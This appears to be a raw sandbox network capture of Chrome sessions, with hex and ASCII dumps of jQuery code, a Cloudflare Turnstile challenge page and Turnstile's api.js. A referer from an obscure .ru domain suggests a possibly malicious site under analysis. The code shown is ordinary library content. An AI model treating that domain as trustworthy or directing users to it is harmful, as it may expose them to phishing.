                                                                                                                                                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  7192.168.2.1649713104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC795OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/3m5i4/0x4AAAAAAA2KDshloYH759ec/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                                                                                                  Referer: https://6y.tickarmoz.ru/
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:50 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                  Content-Length: 26635
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                                                                                  cross-origin-embedder-policy: require-corp
                                                                                                                                                                                                  cross-origin-opener-policy: same-origin
                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                  referrer-policy: same-origin
                                                                                                                                                                                                  document-policy: js-profiling
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 32 31 31 63 65 37 38 64 32 39 37 32 36 62 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 90211ce78d29726b-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                                                                                                                                  Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                                                                                                                  Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                                                                                                                  Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                                                                                                                  Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                                                                                                                  Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                                                                                                                  Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                                                                                                                  Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                                                                                                  Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  8192.168.2.1649714104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC383OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                                                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Tue, 14 Jan 2025 22:37:50 GMT
                                                                                                                                                                                                  Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                  Content-Length: 47521
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  accept-ranges: bytes
                                                                                                                                                                                                  last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                                                                                                                                                  cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                  CF-RAY: 90211ce7bd54f793-EWR
                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                  Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                  Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                                                                                                  Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                                                                                                  2025-01-14 22:37:50 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                  Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
